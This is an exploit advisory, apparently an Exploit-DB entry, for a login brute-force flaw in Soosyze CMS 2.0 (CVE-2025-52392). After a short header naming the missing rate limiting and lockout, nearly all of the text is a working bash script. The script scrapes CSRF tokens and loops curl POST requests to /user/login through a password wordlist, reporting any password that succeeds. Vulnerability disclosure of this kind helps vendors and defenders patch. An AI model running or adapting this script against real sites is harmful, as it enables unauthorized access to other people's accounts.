# Exploit Title: Soosyze CMS 2.0 - Brute Force Login # Google Dork: N/A # Date: 2025-08-13 # Exploit Author: Beatriz Fresno Naumova (beafn28) # Vendor Homepage: https://soosyze.com/ # Software Link: https://github.com/soosyze/soosyze # Version: 2.0 (tested) # Tested on: macOS Sonoma 14.x (Apple Silicon M1), /bin/bash 3.2 & Homebrew bash 5.2, curl 8.x, BSD sed # CVE : CVE-2025-52392 # Description: # Soosyze CMS 2.0 allows brute-force login attacks via /user/login due to missing rate limiting # and account lockout mechanisms. An attacker can submit unlimited POST requests with a known # username/email and a password wordlist, potentially gaining unauthorized access (CWE-307). # PoC Usage: # ./script.sh [wordlist.txt] # If no wordlist is provided, a dictionary is used. #!/usr/bin/env bash set -euo pipefail BASE_URL="http://localhost:8000" LOGIN_PATH="/user/login" EMAIL_FIELD="email" PASS_FIELD="password" TARGET_EMAIL="test@test.com" WORDLIST_FILE="${1:-}" DEFAULT_WORDS=("123456" "admin" "password" "qwerty" "letmein" "admin123" "password1") form_url="$BASE_URL$LOGIN_PATH" COOKIE_JAR="$(mktemp)" get_form() { curl -sS -c "$COOKIE_JAR" -b "$COOKIE_JAR" "$form_url" > /tmp/login_page.html } extract_token() { local name value name=$(sed -nE 's/.*name="([_a-zA-Z0-9:-]*(token|csrf)[_a-zA-Z0-9:-]*)".*type="hidden".*/\1/p' /tmp/login_page.html | head -n1 || true) value="" if [[ -n "$name" ]]; then value=$(sed -nE "s/.*name=\"$name\".*value=\"([^\"]*)\".*/\1/p" /tmp/login_page.html | head -n1 || true) fi printf '%s\t%s\n' "$name" "$value" } post_login() { local pass="$1" tname="$2" tval="$3" curl -sS -o /tmp/resp.html -w "%{http_code}" \ -c "$COOKIE_JAR" -b "$COOKIE_JAR" \ -X POST "$form_url" \ -H "Content-Type: application/x-www-form-urlencoded" \ -H "Origin: $BASE_URL" -H "Referer: $form_url" \ --data-urlencode "$EMAIL_FIELD=$TARGET_EMAIL" \ --data-urlencode "$PASS_FIELD=$pass" \ $( [[ -n "$tname" && -n "$tval" ]] && printf -- '--data-urlencode %s=%s' "$tname" "$tval" ) } echo "[*] Starting brute-force attack on $form_url" [[ -n "$WORDLIST_FILE" && -r "$WORDLIST_FILE" ]] && mapfile -t words < "$WORDLIST_FILE" || words=("${DEFAULT_WORDS[@]}") i=0 for pw in "${words[@]}"; do i=$((i+1)) get_form IFS=$'\t' read -r TOKEN_NAME TOKEN_VALUE < <(extract_token) code=$(post_login "$pw" "$TOKEN_NAME" "$TOKEN_VALUE") if grep -q '"redirect"' /tmp/resp.html; then echo -e "[$i] Password found: '\e[1m$pw\e[0m' (HTTP $code)" break else echo "[$i] '$pw' (HTTP $code)" fi sleep 0.$((RANDOM%9+1)) done rm -f "$COOKIE_JAR" /tmp/resp.html